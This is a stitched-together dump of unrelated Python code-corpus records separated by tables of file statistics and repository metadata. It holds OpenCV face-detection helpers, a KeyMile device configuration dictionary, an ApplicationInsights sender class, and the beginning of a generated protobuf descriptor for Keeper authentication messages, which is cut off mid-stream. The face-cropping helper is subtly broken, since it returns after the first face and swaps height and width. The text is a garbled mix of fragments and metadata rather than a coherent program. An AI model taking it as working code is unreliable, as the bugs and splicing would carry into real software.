def detect_faces(img):
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
return detect(img, cascade)
def to_grayscale(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.equalizeHist(gray)
return gray
def contains_face(img):
return len(detect_faces(img)) > 0
def save(path, img):
cv2.imwrite(path, img)
def crop_faces(img, faces):
for face in faces:
x, y, h, w = [result for result in face]
return img[y:y+h,x:x+w]
| 22.868421 | 124 | 0.713464 | 131 | 869 | 4.618321 | 0.442748 | 0.049587 | 0.052893 | 0.092562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023644 | 0.172612 | 869 | 37 | 125 | 23.486486 | 0.817803 | 0.063291 | 0 | 0 | 0 | 0 | 0.049322 | 0.038224 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.185185 | 0.037037 | 0.62963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9fc7b2e5b657a376e8b1bc3260644d2fcc0ce1e | 230 | py | Python | nesi/vendors/KeyMile/accessPoints/root/unit/logport/logportsManagementFunctions.py | inexio/NESi | 920b23ccaf293733b4b571e4df27929c036257f7 | [
"BSD-2-Clause"
] | 30 | 2020-09-03T06:02:38.000Z | 2022-03-11T16:34:18.000Z | vendors/KeyMile/accessPoints/root/unit/logport/logportsManagementFunctions.py | Tubbz-alt/NESi | 0db169dd6378fbd097380280cc41440e652de19e | [
"BSD-2-Clause"
] | 2 | 2021-01-15T10:33:23.000Z | 2021-02-21T21:04:37.000Z | vendors/KeyMile/accessPoints/root/unit/logport/logportsManagementFunctions.py | Tubbz-alt/NESi | 0db169dd6378fbd097380280cc41440e652de19e | [
"BSD-2-Clause"
] | 3 | 2020-12-19T09:11:19.000Z | 2022-02-07T22:15:34.000Z | main = {
'General': {
'Prop': {
'Labels': 'rw',
'AlarmStatus': 'r-'
}
}
}
cfgm = {
'Logicalport': {
'Cmd': (
'Create',
'Delete'
)
}
} | 13.529412 | 31 | 0.282609 | 12 | 230 | 5.416667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.530435 | 230 | 17 | 32 | 13.529412 | 0.601852 | 0 | 0 | 0 | 0 | 0 | 0.251082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9fcebe268137550d153588efac21c43c2d0c43c | 586 | py | Python | applicationinsights/channel/SynchronousSender.py | janhaviagrawal/ApplicationInsights-Python | 49a58cd688a866c71c952019b6c9ee71772443c3 | [
"MIT"
] | 1 | 2019-05-26T12:52:55.000Z | 2019-05-26T12:52:55.000Z | applicationinsights/channel/SynchronousSender.py | janhaviagrawal/ApplicationInsights-Python | 49a58cd688a866c71c952019b6c9ee71772443c3 | [
"MIT"
] | null | null | null | applicationinsights/channel/SynchronousSender.py | janhaviagrawal/ApplicationInsights-Python | 49a58cd688a866c71c952019b6c9ee71772443c3 | [
"MIT"
] | 1 | 2019-05-26T12:56:38.000Z | 2019-05-26T12:56:38.000Z | from .SenderBase import SenderBase
class SynchronousSender(SenderBase):
"""A synchronous sender that works in conjunction with the :class:`SynchronousQueue`. The queue will call
:func:`send` on the current instance with the data to send.
"""
def __init__(self, service_endpoint_uri='https://dc.services.visualstudio.com/v2/track'):
"""Initializes a new instance of the class.
Args:
sender (String) service_endpoint_uri the address of the service to send telemetry data to.
"""
SenderBase.__init__(self, service_endpoint_uri) | 45.076923 | 109 | 0.711604 | 75 | 586 | 5.373333 | 0.6 | 0.111663 | 0.133995 | 0.114144 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002141 | 0.203072 | 586 | 13 | 110 | 45.076923 | 0.860814 | 0.520478 | 0 | 0 | 0 | 0 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6a034850a5c2ebc5999caf58cfe48126affd8dbe | 99,548 | py | Python | keepercommander/proto/APIRequest_pb2.py | Keeper-Security/commander | 93fee5d2ba56f2288e00ab33003597d00a302b5c | [
"MIT"
] | null | null | null | keepercommander/proto/APIRequest_pb2.py | Keeper-Security/commander | 93fee5d2ba56f2288e00ab33003597d00a302b5c | [
"MIT"
] | null | null | null | keepercommander/proto/APIRequest_pb2.py | Keeper-Security/commander | 93fee5d2ba56f2288e00ab33003597d00a302b5c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: APIRequest.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import enterprise_pb2 as enterprise__pb2
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x10\x41PIRequest.proto\x12\x0e\x41uthentication\x1a\x10\x65nterprise.proto\"\xb0\x01\n\nApiRequest\x12 \n\x18\x65ncryptedTransmissionKey\x18\x01 \x01(\x0c\x12\x13\n\x0bpublicKeyId\x18\x02 \x01(\x05\x12\x0e\n\x06locale\x18\x03 \x01(\t\x12\x18\n\x10\x65ncryptedPayload\x18\x04 \x01(\x0c\x12\x16\n\x0e\x65ncryptionType\x18\x05 \x01(\x05\x12\x11\n\trecaptcha\x18\x06 \x01(\t\x12\x16\n\x0esubEnvironment\x18\x07 \x01(\t\"j\n\x11\x41piRequestPayload\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x02 \x01(\x0c\x12\x11\n\ttimeToken\x18\x03 \x01(\x0c\x12\x12\n\napiVersion\x18\x04 \x01(\x05\"6\n\tTransform\x12\x0b\n\x03key\x18\x01 \x01(\x0c\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x02 \x01(\x0c\":\n\rDeviceRequest\x12\x15\n\rclientVersion\x18\x01 \x01(\t\x12\x12\n\ndeviceName\x18\x02 \x01(\t\"T\n\x0b\x41uthRequest\x12\x15\n\rclientVersion\x18\x01 \x01(\t\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x03 \x01(\x0c\"\x8b\x01\n\x14NewUserMinimumParams\x12\x19\n\x11minimumIterations\x18\x01 \x01(\x05\x12\x1a\n\x12passwordMatchRegex\x18\x02 \x03(\t\x12 \n\x18passwordMatchDescription\x18\x03 \x03(\t\x12\x1a\n\x12isEnterpriseDomain\x18\x04 \x01(\x08\"\x89\x01\n\x0fPreLoginRequest\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12,\n\tloginType\x18\x02 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x16\n\x0etwoFactorToken\x18\x03 \x01(\x0c\"\x80\x02\n\x0cLoginRequest\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12,\n\tloginType\x18\x02 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x1f\n\x17\x61uthenticationHashPrime\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x04 \x01(\x0c\x12\x14\n\x0c\x61uthResponse\x18\x05 \x01(\x0c\x12\x16\n\x0emcEnterpriseId\x18\x06 \x01(\x05\x12\x12\n\npush_token\x18\x07 \x01(\t\x12\x10\n\x08platform\x18\x08 \x01(\t\"\\\n\x0e\x44\x65viceResponse\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12,\n\x06status\x18\x02 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"V\n\x04Salt\x12\x12\n\niterations\x18\x01 \x01(\x05\x12\x0c\n\x04salt\x18\x02 \x01(\x0c\x12\x11\n\talgorithm\x18\x03 \x01(\x05\x12\x0b\n\x03uid\x18\x04 \x01(\x0c\x12\x0c\n\x04name\x18\x05 \x01(\t\" \n\x10TwoFactorChannel\x12\x0c\n\x04type\x18\x01 \x01(\x05\"\xe2\x02\n\x11StartLoginRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x15\n\rclientVersion\x18\x03 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x04 \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x05 \x01(\x0c\x12,\n\tloginType\x18\x06 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x16\n\x0emcEnterpriseId\x18\x07 \x01(\x05\x12\x30\n\x0bloginMethod\x18\x08 \x01(\x0e\x32\x1b.Authentication.LoginMethod\x12\x15\n\rforceNewLogin\x18\t \x01(\x08\x12\x11\n\tcloneCode\x18\n \x01(\x0c\x12\x18\n\x10v2TwoFactorToken\x18\x0b \x01(\t\x12\x12\n\naccountUid\x18\x0c \x01(\x0c\"\x85\x04\n\rLoginResponse\x12.\n\nloginState\x18\x01 \x01(\x0e\x32\x1a.Authentication.LoginState\x12\x12\n\naccountUid\x18\x02 \x01(\x0c\x12\x17\n\x0fprimaryUsername\x18\x03 \x01(\t\x12\x18\n\x10\x65ncryptedDataKey\x18\x04 \x01(\x0c\x12\x42\n\x14\x65ncryptedDataKeyType\x18\x05 \x01(\x0e\x32$.Authentication.EncryptedDataKeyType\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x06 \x01(\x0c\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x07 \x01(\x0c\x12:\n\x10sessionTokenType\x18\x08 \x01(\x0e\x32 .Authentication.SessionTokenType\x12\x0f\n\x07message\x18\t \x01(\t\x12\x0b\n\x03url\x18\n \x01(\t\x12\x36\n\x08\x63hannels\x18\x0b \x03(\x0b\x32$.Authentication.TwoFactorChannelInfo\x12\"\n\x04salt\x18\x0c \x03(\x0b\x32\x14.Authentication.Salt\x12\x11\n\tcloneCode\x18\r \x01(\x0c\x12\x1a\n\x12stateSpecificValue\x18\x0e \x01(\t\x12\x18\n\x10ssoClientVersion\x18\x0f \x01(\t\"\x8c\x01\n\x0bSsoUserInfo\x12\x13\n\x0b\x63ompanyName\x18\x01 \x01(\t\x12\x13\n\x0bsamlRequest\x18\x02 \x01(\t\x12\x17\n\x0fsamlRequestType\x18\x03 \x01(\t\x12\x15\n\rssoDomainName\x18\x04 \x01(\t\x12\x10\n\x08loginUrl\x18\x05 \x01(\t\x12\x11\n\tlogoutUrl\x18\x06 \x01(\t\"\xd6\x01\n\x10PreLoginResponse\x12\x32\n\x0c\x64\x65viceStatus\x18\x01 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\x12\"\n\x04salt\x18\x02 \x03(\x0b\x32\x14.Authentication.Salt\x12\x38\n\x0eOBSOLETE_FIELD\x18\x03 \x03(\x0b\x32 .Authentication.TwoFactorChannel\x12\x30\n\x0bssoUserInfo\x18\x04 \x01(\x0b\x32\x1b.Authentication.SsoUserInfo\"&\n\x12LoginAsUserRequest\x12\x10\n\x08username\x18\x01 \x01(\t\"W\n\x13LoginAsUserResponse\x12\x1d\n\x15\x65ncryptedSessionToken\x18\x01 \x01(\x0c\x12!\n\x19\x65ncryptedSharedAccountKey\x18\x02 \x01(\x0c\"\x84\x01\n\x17ValidateAuthHashRequest\x12\x36\n\x0epasswordMethod\x18\x01 \x01(\x0e\x32\x1e.Authentication.PasswordMethod\x12\x14\n\x0c\x61uthResponse\x18\x02 \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x03 \x01(\x0c\"\x88\x02\n\x14TwoFactorChannelInfo\x12\x39\n\x0b\x63hannelType\x18\x01 \x01(\x0e\x32$.Authentication.TwoFactorChannelType\x12\x13\n\x0b\x63hannel_uid\x18\x02 \x01(\x0c\x12\x13\n\x0b\x63hannelName\x18\x03 \x01(\t\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x14\n\x0c\x63\x61pabilities\x18\x05 \x03(\t\x12\x13\n\x0bphoneNumber\x18\x06 \x01(\t\x12:\n\rmaxExpiration\x18\x07 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\x12\x11\n\tcreatedOn\x18\x08 \x01(\x03\"d\n\x12TwoFactorDuoStatus\x12\x14\n\x0c\x63\x61pabilities\x18\x01 \x03(\t\x12\x13\n\x0bphoneNumber\x18\x02 \x01(\t\x12\x12\n\nenroll_url\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t\"\xc7\x01\n\x13TwoFactorAddRequest\x12\x39\n\x0b\x63hannelType\x18\x01 \x01(\x0e\x32$.Authentication.TwoFactorChannelType\x12\x13\n\x0b\x63hannel_uid\x18\x02 \x01(\x0c\x12\x13\n\x0b\x63hannelName\x18\x03 \x01(\t\x12\x13\n\x0bphoneNumber\x18\x04 \x01(\t\x12\x36\n\x0b\x64uoPushType\x18\x05 \x01(\x0e\x32!.Authentication.TwoFactorPushType\"B\n\x16TwoFactorRenameRequest\x12\x13\n\x0b\x63hannel_uid\x18\x01 \x01(\x0c\x12\x13\n\x0b\x63hannelName\x18\x02 \x01(\t\"=\n\x14TwoFactorAddResponse\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12\x12\n\nbackupKeys\x18\x02 \x03(\t\"-\n\x16TwoFactorDeleteRequest\x12\x13\n\x0b\x63hannel_uid\x18\x01 \x01(\x0c\"a\n\x15TwoFactorListResponse\x12\x36\n\x08\x63hannels\x18\x01 \x03(\x0b\x32$.Authentication.TwoFactorChannelInfo\x12\x10\n\x08\x65xpireOn\x18\x02 \x01(\x03\"Y\n TwoFactorUpdateExpirationRequest\x12\x35\n\x08\x65xpireIn\x18\x01 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\"\xc9\x01\n\x18TwoFactorValidateRequest\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x35\n\tvalueType\x18\x02 \x01(\x0e\x32\".Authentication.TwoFactorValueType\x12\r\n\x05value\x18\x03 \x01(\t\x12\x13\n\x0b\x63hannel_uid\x18\x04 \x01(\x0c\x12\x35\n\x08\x65xpireIn\x18\x05 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\"8\n\x19TwoFactorValidateResponse\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\"\xb8\x01\n\x18TwoFactorSendPushRequest\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x01 \x01(\x0c\x12\x33\n\x08pushType\x18\x02 \x01(\x0e\x32!.Authentication.TwoFactorPushType\x12\x13\n\x0b\x63hannel_uid\x18\x03 \x01(\x0c\x12\x35\n\x08\x65xpireIn\x18\x04 \x01(\x0e\x32#.Authentication.TwoFactorExpiration\"\x83\x01\n\x07License\x12\x0f\n\x07\x63reated\x18\x01 \x01(\x03\x12\x12\n\nexpiration\x18\x02 \x01(\x03\x12\x34\n\rlicenseStatus\x18\x03 \x01(\x0e\x32\x1d.Authentication.LicenseStatus\x12\x0c\n\x04paid\x18\x04 \x01(\x08\x12\x0f\n\x07message\x18\x05 \x01(\t\"G\n\x0fOwnerlessRecord\x12\x11\n\trecordUid\x18\x01 \x01(\x0c\x12\x11\n\trecordKey\x18\x02 \x01(\x0c\x12\x0e\n\x06status\x18\x03 \x01(\x05\"L\n\x10OwnerlessRecords\x12\x38\n\x0fownerlessRecord\x18\x01 \x03(\x0b\x32\x1f.Authentication.OwnerlessRecord\"\xd7\x01\n\x0fUserAuthRequest\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04salt\x18\x02 \x01(\x0c\x12\x12\n\niterations\x18\x03 \x01(\x05\x12\x1a\n\x12\x65ncryptedClientKey\x18\x04 \x01(\x0c\x12\x10\n\x08\x61uthHash\x18\x05 \x01(\x0c\x12\x18\n\x10\x65ncryptedDataKey\x18\x06 \x01(\x0c\x12,\n\tloginType\x18\x07 \x01(\x0e\x32\x19.Authentication.LoginType\x12\x0c\n\x04name\x18\x08 \x01(\t\x12\x11\n\talgorithm\x18\t \x01(\x05\"\x19\n\nUidRequest\x12\x0b\n\x03uid\x18\x01 \x03(\x0c\"\xab\x01\n\x13\x44\x65viceUpdateRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x12\n\ndeviceName\x18\x03 \x01(\t\x12\x17\n\x0f\x64\x65vicePublicKey\x18\x04 \x01(\x0c\x12\x32\n\x0c\x64\x65viceStatus\x18\x05 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"\x81\x01\n\x1dRegisterDeviceInRegionRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x12\n\ndeviceName\x18\x03 \x01(\t\x12\x17\n\x0f\x64\x65vicePublicKey\x18\x04 \x01(\x0c\"\xf8\x02\n\x13RegistrationRequest\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12\x38\n\x0fuserAuthRequest\x18\x02 \x01(\x0b\x32\x1f.Authentication.UserAuthRequest\x12\x1a\n\x12\x65ncryptedClientKey\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x04 \x01(\x0c\x12\x11\n\tpublicKey\x18\x05 \x01(\x0c\x12\x18\n\x10verificationCode\x18\x06 \x01(\t\x12\x1e\n\x16\x64\x65precatedAuthHashHash\x18\x07 \x01(\x0c\x12$\n\x1c\x64\x65precatedEncryptedClientKey\x18\x08 \x01(\x0c\x12%\n\x1d\x64\x65precatedEncryptedPrivateKey\x18\t \x01(\x0c\x12\"\n\x1a\x64\x65precatedEncryptionParams\x18\n \x01(\x0c\"\xd0\x01\n\x16\x43onvertUserToV3Request\x12\x30\n\x0b\x61uthRequest\x18\x01 \x01(\x0b\x32\x1b.Authentication.AuthRequest\x12\x38\n\x0fuserAuthRequest\x18\x02 \x01(\x0b\x32\x1f.Authentication.UserAuthRequest\x12\x1a\n\x12\x65ncryptedClientKey\x18\x03 \x01(\x0c\x12\x1b\n\x13\x65ncryptedPrivateKey\x18\x04 \x01(\x0c\x12\x11\n\tpublicKey\x18\x05 \x01(\x0c\"$\n\x10RevisionResponse\x12\x10\n\x08revision\x18\x01 \x01(\x03\"&\n\x12\x43hangeEmailRequest\x12\x10\n\x08newEmail\x18\x01 \x01(\t\"8\n\x13\x43hangeEmailResponse\x12!\n\x19\x65ncryptedChangeEmailToken\x18\x01 \x01(\x0c\"6\n\x1d\x45mailVerificationLinkResponse\x12\x15\n\remailVerified\x18\x01 \x01(\x08\")\n\x0cSecurityData\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04\x64\x61ta\x18\x02 \x01(\x0c\"\x91\x01\n\x13SecurityDataRequest\x12\x38\n\x12recordSecurityData\x18\x01 \x03(\x0b\x32\x1c.Authentication.SecurityData\x12@\n\x1amasterPasswordSecurityData\x18\x02 \x03(\x0b\x32\x1c.Authentication.SecurityData\"\xb5\x01\n\x1dSecurityReportIncrementalData\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\x1b\n\x13\x63urrentSecurityData\x18\x02 \x01(\x0c\x12#\n\x1b\x63urrentSecurityDataRevision\x18\x03 \x01(\x03\x12\x17\n\x0foldSecurityData\x18\x04 \x01(\x0c\x12\x1f\n\x17oldSecurityDataRevision\x18\x05 \x01(\x03\"\xf5\x01\n\x0eSecurityReport\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\x1b\n\x13\x65ncryptedReportData\x18\x02 \x01(\x0c\x12\x10\n\x08revision\x18\x03 \x01(\x03\x12\x11\n\ttwoFactor\x18\x04 \x01(\t\x12\x11\n\tlastLogin\x18\x05 \x01(\x03\x12\x1e\n\x16numberOfReusedPassword\x18\x06 \x01(\x05\x12T\n\x1dsecurityReportIncrementalData\x18\x07 \x03(\x0b\x32-.Authentication.SecurityReportIncrementalData\"S\n\x19SecurityReportSaveRequest\x12\x36\n\x0esecurityReport\x18\x01 \x03(\x0b\x32\x1e.Authentication.SecurityReport\")\n\x15SecurityReportRequest\x12\x10\n\x08\x66romPage\x18\x01 \x01(\x03\"\xb8\x01\n\x16SecurityReportResponse\x12\x1c\n\x14\x65nterprisePrivateKey\x18\x01 \x01(\x0c\x12\x36\n\x0esecurityReport\x18\x02 \x03(\x0b\x32\x1e.Authentication.SecurityReport\x12\x14\n\x0c\x61sOfRevision\x18\x03 \x01(\x03\x12\x10\n\x08\x66romPage\x18\x04 \x01(\x03\x12\x0e\n\x06toPage\x18\x05 \x01(\x03\x12\x10\n\x08\x63omplete\x18\x06 \x01(\x08\"\'\n\x16ReusedPasswordsRequest\x12\r\n\x05\x63ount\x18\x01 \x01(\x05\">\n\x14SummaryConsoleReport\x12\x12\n\nreportType\x18\x01 \x01(\x05\x12\x12\n\nreportData\x18\x02 \x01(\x0c\"|\n\x12\x43hangeToKeyTypeOne\x12/\n\nobjectType\x18\x01 \x01(\x0e\x32\x1b.Authentication.ObjectTypes\x12\x12\n\nprimaryUid\x18\x02 \x01(\x0c\x12\x14\n\x0csecondaryUid\x18\x03 \x01(\x0c\x12\x0b\n\x03key\x18\x04 \x01(\x0c\"[\n\x19\x43hangeToKeyTypeOneRequest\x12>\n\x12\x63hangeToKeyTypeOne\x18\x01 \x03(\x0b\x32\".Authentication.ChangeToKeyTypeOne\"U\n\x18\x43hangeToKeyTypeOneStatus\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04type\x18\x02 \x01(\t\x12\x0e\n\x06status\x18\x03 \x01(\t\x12\x0e\n\x06reason\x18\x04 \x01(\t\"h\n\x1a\x43hangeToKeyTypeOneResponse\x12J\n\x18\x63hangeToKeyTypeOneStatus\x18\x01 \x03(\x0b\x32(.Authentication.ChangeToKeyTypeOneStatus\"!\n\x06SetKey\x12\n\n\x02id\x18\x01 \x01(\x03\x12\x0b\n\x03key\x18\x02 \x01(\x0c\"5\n\rSetKeyRequest\x12$\n\x04keys\x18\x01 \x03(\x0b\x32\x16.Authentication.SetKey\"\xf2\x04\n\x11\x43reateUserRequest\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x14\n\x0c\x61uthVerifier\x18\x02 \x01(\x0c\x12\x18\n\x10\x65ncryptionParams\x18\x03 \x01(\x0c\x12\x14\n\x0crsaPublicKey\x18\x04 \x01(\x0c\x12\x1e\n\x16rsaEncryptedPrivateKey\x18\x05 \x01(\x0c\x12\x14\n\x0c\x65\x63\x63PublicKey\x18\x06 \x01(\x0c\x12\x1e\n\x16\x65\x63\x63\x45ncryptedPrivateKey\x18\x07 \x01(\x0c\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x08 \x01(\x0c\x12\x1a\n\x12\x65ncryptedClientKey\x18\t \x01(\x0c\x12\x15\n\rclientVersion\x18\n \x01(\t\x12\x1e\n\x16\x65ncryptedDeviceDataKey\x18\x0b \x01(\x0c\x12\x1b\n\x13\x65ncryptedLoginToken\x18\x0c \x01(\x0c\x12\x19\n\x11messageSessionUid\x18\r \x01(\x0c\x12\x17\n\x0finstallReferrer\x18\x0e \x01(\t\x12\x0e\n\x06mccMNC\x18\x0f \x01(\x05\x12\x0b\n\x03mfg\x18\x10 \x01(\t\x12\r\n\x05model\x18\x11 \x01(\t\x12\r\n\x05\x62rand\x18\x12 \x01(\t\x12\x0f\n\x07product\x18\x13 \x01(\t\x12\x0e\n\x06\x64\x65vice\x18\x14 \x01(\t\x12\x0f\n\x07\x63\x61rrier\x18\x15 \x01(\t\x12\x18\n\x10verificationCode\x18\x16 \x01(\t\x12\x42\n\x16\x65nterpriseRegistration\x18\x17 \x01(\x0b\x32\".Enterprise.EnterpriseRegistration\x12\"\n\x1a\x65ncryptedVerificationToken\x18\x18 \x01(\x0c\"W\n!NodeEnforcementAddOrUpdateRequest\x12\x0e\n\x06nodeId\x18\x01 \x01(\x03\x12\x13\n\x0b\x65nforcement\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\"C\n\x1cNodeEnforcementRemoveRequest\x12\x0e\n\x06nodeId\x18\x01 \x01(\x03\x12\x13\n\x0b\x65nforcement\x18\x02 \x01(\t\"\x9f\x01\n\x0f\x41piRequestByKey\x12\r\n\x05keyId\x18\x01 \x01(\x05\x12\x0f\n\x07payload\x18\x02 \x01(\x0c\x12\x10\n\x08username\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12<\n\x11supportedLanguage\x18\x05 \x01(\x0e\x32!.Authentication.SupportedLanguage\x12\x0c\n\x04type\x18\x06 \x01(\x05\".\n\x0fMemcacheRequest\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x0e\n\x06userId\x18\x02 \x01(\x05\".\n\x10MemcacheResponse\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\"w\n\x1cMasterPasswordReentryRequest\x12\x16\n\x0epbkdf2Password\x18\x01 \x01(\t\x12?\n\x06\x61\x63tion\x18\x02 \x01(\x0e\x32/.Authentication.MasterPasswordReentryActionType\"_\n\x19\x44\x65viceRegistrationRequest\x12\x15\n\rclientVersion\x18\x01 \x01(\t\x12\x12\n\ndeviceName\x18\x02 \x01(\t\x12\x17\n\x0f\x64\x65vicePublicKey\x18\x03 \x01(\x0c\"\x9a\x01\n\x19\x44\x65viceVerificationRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x1b\n\x13verificationChannel\x18\x03 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x04 \x01(\x0c\x12\x15\n\rclientVersion\x18\x05 \x01(\t\"\xb2\x01\n\x1a\x44\x65viceVerificationResponse\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x03 \x01(\x0c\x12\x15\n\rclientVersion\x18\x04 \x01(\t\x12\x32\n\x0c\x64\x65viceStatus\x18\x05 \x01(\x0e\x32\x1c.Authentication.DeviceStatus\"\xc8\x01\n\x15\x44\x65viceApprovalRequest\x12\r\n\x05\x65mail\x18\x01 \x01(\t\x12\x18\n\x10twoFactorChannel\x18\x02 \x01(\t\x12\x15\n\rclientVersion\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x05 \x01(\x0c\x12\x10\n\x08totpCode\x18\x06 \x01(\t\x12\x10\n\x08\x64\x65viceIp\x18\x07 \x01(\t\x12\x1d\n\x15\x64\x65viceTokenExpireDays\x18\x08 \x01(\t\"9\n\x16\x44\x65viceApprovalResponse\x12\x1f\n\x17\x65ncryptedTwoFactorToken\x18\x01 \x01(\x0c\"~\n\x14\x41pproveDeviceRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x1e\n\x16\x65ncryptedDeviceDataKey\x18\x02 \x01(\x0c\x12\x14\n\x0c\x64\x65nyApproval\x18\x03 \x01(\x08\x12\x12\n\nlinkDevice\x18\x04 \x01(\x08\"E\n\x1a\x45nterpriseUserAliasRequest\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\r\n\x05\x61lias\x18\x02 \x01(\t\"Y\n\x1d\x45nterpriseUserAddAliasRequest\x12\x18\n\x10\x65nterpriseUserId\x18\x01 \x01(\x03\x12\r\n\x05\x61lias\x18\x02 \x01(\t\x12\x0f\n\x07primary\x18\x03 \x01(\x08\"&\n\x06\x44\x65vice\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\"\\\n\x1cRegisterDeviceDataKeyRequest\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x01 \x01(\x0c\x12\x1e\n\x16\x65ncryptedDeviceDataKey\x18\x02 \x01(\x0c\"n\n)ValidateCreateUserVerificationCodeRequest\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x18\n\x10verificationCode\x18\x03 \x01(\t\"\xa3\x01\n%ValidateDeviceVerificationCodeRequest\x12\x10\n\x08username\x18\x01 \x01(\t\x12\x15\n\rclientVersion\x18\x02 \x01(\t\x12\x18\n\x10verificationCode\x18\x03 \x01(\t\x12\x19\n\x11messageSessionUid\x18\x04 \x01(\x0c\x12\x1c\n\x14\x65ncryptedDeviceToken\x18\x05 \x01(\x0c\"Y\n\x19SendSessionMessageRequest\x12\x19\n\x11messageSessionUid\x18\x01 